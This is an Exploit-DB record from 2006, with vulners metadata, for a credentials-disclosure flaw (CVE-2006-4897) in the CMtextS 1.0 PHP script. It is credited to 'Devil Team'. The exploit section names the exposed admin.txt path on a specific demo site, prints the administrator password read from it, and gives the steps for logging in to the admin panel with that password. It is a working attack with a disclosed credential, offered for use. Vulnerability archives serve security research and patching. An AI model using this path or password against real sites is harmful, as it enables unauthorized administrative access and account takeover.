ID EDB-ID:2388
Type exploitdb
Reporter Kacper
Modified 2006-09-17T00:00:00
Description
CMtextS <= 1.0 (users_logins/admin.txt) Credentials Disclosure Vuln. CVE-2006-4897. Webapps exploit for php platform
::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- CMtextS <= 1.0 Read Admin Password Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: CMtextS 1.0
- [Script site: http://cmtexts.calctc.com/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Find by: Kacper (a.k.a Rahim)
+
- DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
+
- Contact: kacper1964@yahoo.pl
- or
- http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
- SkD, nukedclx, Ramzes
-
- Greetz for all users DEVIL TEAM IRC Channel !!
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Z Dedykacja dla osoby,
- bez ktorej nie mogl bym zyc...
- K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://www.cmtexts.pl/path/users_logins/admin.txt
exemple:
http://cmtexts.calctc.com/users_logins/admin.txt
Read:
lolskr3czulol|zmien has.o na jakie chcesz|muisz zmieni.!
> lolskr3czulol < Admin password.
Now go to:
http://cmtexts.calctc.com/admin.php
Login: Admin
pass: lolskr3czulol
greetz ;-)
#DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
# milw0rm.com [2006-09-17]
{"hash": "5218735b311da5073dfda98962f9a6faeb9b97f4a0f86bd8e3f870b532e0e0a7", "id": "EDB-ID:2388", "lastseen": "2016-01-31T16:09:00", "viewCount": 2, "bulletinFamily": "exploit", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/2388/", "description": "CMtextS <= 1.0 (users_logins/admin.txt) Credentials Disclosure Vuln. CVE-2006-4897. Webapps exploit for php platform", "title": "CMtextS <= 1.0 users_logins/admin.txt Credentials Disclosure Vuln", "sourceData": "::::::::: :::::::::: ::: ::: ::::::::::: ::: \n:+: :+: :+: :+: :+: :+: :+: \n+:+ +:+ +:+ +:+ +:+ +:+ +:+ \n+#+ +:+ +#++:++# +#+ +:+ +#+ +#+ \n+#+ +#+ +#+ +#+ +#+ +#+ +#+ \n#+# #+# #+# #+#+#+# #+# #+# \n######### ########## ### ########### ########## \n::::::::::: :::::::::: ::: :::: :::: \n :+: :+: :+: :+: +:+:+: :+:+:+ \n +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ \n +#+ +#++:++# +#++:++#++: +#+ +:+ +#+ \n +#+ +#+ +#+ +#+ +#+ +#+ \n #+# #+# #+# #+# #+# #+# \n ### ########## ### ### ### ### \n\t\n\t\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- - - [DEVIL TEAM THE BEST POLISH TEAM] - -\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- CMtextS <= 1.0 Read Admin Password Vulnerability\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- [Script name: CMtextS 1.0\n- [Script site: http://cmtexts.calctc.com/\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- Find by: Kacper (a.k.a Rahim)\n+\n- DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\n+\n- Contact: kacper1964@yahoo.pl\n- or\n- http://www.rahim.webd.pl/\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- Special Greetz: DragonHeart ;-)\n- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus\n- SkD, nukedclx, Ramzes\n-\n- Greetz for all users DEVIL TEAM IRC Channel !!\n!@ Przyjazni nie da sie zamienic na marne korzysci @!\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- Z Dedykacja dla osoby,\n- bez ktorej nie mogl bym zyc...\n- K.C:* J.M (a.k.a Magaja)\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nExploit:\n\nhttp://www.cmtexts.pl/path/users_logins/admin.txt\n\nexemple:\nhttp://cmtexts.calctc.com/users_logins/admin.txt\nRead:\nlolskr3czulol|zmien has.o na jakie chcesz|muisz zmieni.!\n> lolskr3czulol < Admin password.\n\nNow go to:\nhttp://cmtexts.calctc.com/admin.php\n\nLogin: Admin\npass: lolskr3czulol\n\ngreetz ;-)\n\n#DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\n\n# milw0rm.com [2006-09-17]\n", "objectVersion": "1.0", "cvelist": ["CVE-2006-4897"], "published": "2006-09-17T00:00:00", "osvdbidlist": ["28953"], "references": [], "reporter": "Kacper", "modified": "2006-09-17T00:00:00", "href": "https://www.exploit-db.com/exploits/2388/"}
{"result": {"cve": [{"id": "CVE-2006-4897", "type": "cve", "title": "CVE-2006-4897", "description": "CMtextS 1.0 and earlier stores users_logins/admin.txt under the web document root with insufficient access control, which allows remote attackers to obtain the administrator password.", "published": "2006-09-19T18:07:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4897", "cvelist": ["CVE-2006-4897"], "lastseen": "2017-10-19T11:12:32"}], "osvdb": [{"id": "OSVDB:28953", "type": "osvdb", "title": "CMtextS admin.txt Cleartext Password Disclosure", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://cmtexts.calctc.com/\n[Secunia Advisory ID:21988](https://secuniaresearch.flexerasoftware.com/advisories/21988/)\nGeneric Exploit URL: http://milw0rm.com/exploits/2388\nFrSIRT Advisory: ADV-2006-3690\n[CVE-2006-4897](https://vulners.com/cve/CVE-2006-4897)\n", "published": "2006-09-17T13:03:51", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://vulners.com/osvdb/OSVDB:28953", "cvelist": ["CVE-2006-4897"], "lastseen": "2017-04-28T13:20:25"}]}}